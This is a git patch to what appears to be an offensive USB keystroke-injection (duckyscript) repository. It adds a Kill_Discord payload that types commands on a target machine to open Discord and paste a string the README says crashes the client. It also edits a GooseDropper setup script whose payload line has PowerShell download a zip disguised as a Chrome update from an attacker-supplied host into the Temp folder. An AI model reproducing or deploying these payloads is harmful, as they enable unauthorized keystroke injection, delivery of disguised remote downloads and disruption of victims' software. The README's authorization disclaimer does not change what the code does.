From b13c5e1f38d7a959963fc1e533201346ad638c6b Mon Sep 17 00:00:00 2001 From: Fr3ki Date: Sat, 13 Apr 2024 15:11:27 -0600 Subject: [PATCH] Added Kill_Discord --- Duckyscripts/GooseDropper/linux_setup.sh | 2 +- Duckyscripts/Kill_Discord/README.txt | 9 +++++++++ Duckyscripts/Kill_Discord/kill_discord.txt | 12 ++++++++++++ 3 files changed, 22 insertions(+), 1 deletion(-) create mode 100644 Duckyscripts/Kill_Discord/README.txt create mode 100644 Duckyscripts/Kill_Discord/kill_discord.txt diff --git a/Duckyscripts/GooseDropper/linux_setup.sh b/Duckyscripts/GooseDropper/linux_setup.sh index 62b7c7e..36263ef 100644 --- a/Duckyscripts/GooseDropper/linux_setup.sh +++ b/Duckyscripts/GooseDropper/linux_setup.sh @@ -23,7 +23,7 @@ then read -p "Enter your URL: " SRC SRC="$(echo "$SRC" | sed 's/\//\\\//g')" #Add your URL to the payload - sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Update.zip/powershell \"wget \'${SRC}\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt + sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Update.zip/powershell \"wget \'${SRC}\' -OutFile \$ENV:Temp\/Update.zip\"/" GooseDropper.txt #Remind users to have the zip ready echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL" diff --git a/Duckyscripts/Kill_Discord/README.txt b/Duckyscripts/Kill_Discord/README.txt new file mode 100644 index 0000000..feb92e2 --- /dev/null +++ b/Duckyscripts/Kill_Discord/README.txt @@ -0,0 +1,9 @@ +Kill_Discord is a duckyscript that does exactly what the name implies. + +As of April 2024 the string "http://./\<#0>: ://./<#0>" without the quotes will crash your Discord client when pasted into any message box. + +This script opens Discord on the target machine and pastes that string into the first available text box. + +Just to reitterate this crashes the Discord client of the SENDER, hence the need for a duckyscript. + +As always, don't be a skid, and only use these scripts on devices which you are expresely authorized to use them on. I am not liable for any unauthorized usage or damage caused by the usage of this tool. diff --git a/Duckyscripts/Kill_Discord/kill_discord.txt b/Duckyscripts/Kill_Discord/kill_discord.txt new file mode 100644 index 0000000..1360a93 --- /dev/null +++ b/Duckyscripts/Kill_Discord/kill_discord.txt @@ -0,0 +1,12 @@ +DELAY 500 +GUI r +DELAY 500 +STRING C:\ProgramData\%USERNAME%\Discord\Update.exe --processStart Discord.exe +DELAY 500 +ENTER +DELAY 2000 +CTRL k +DELAY 100 +ENTER +DELAY 500 +STRING http://./\<#0>: ://./<#0> \ No newline at end of file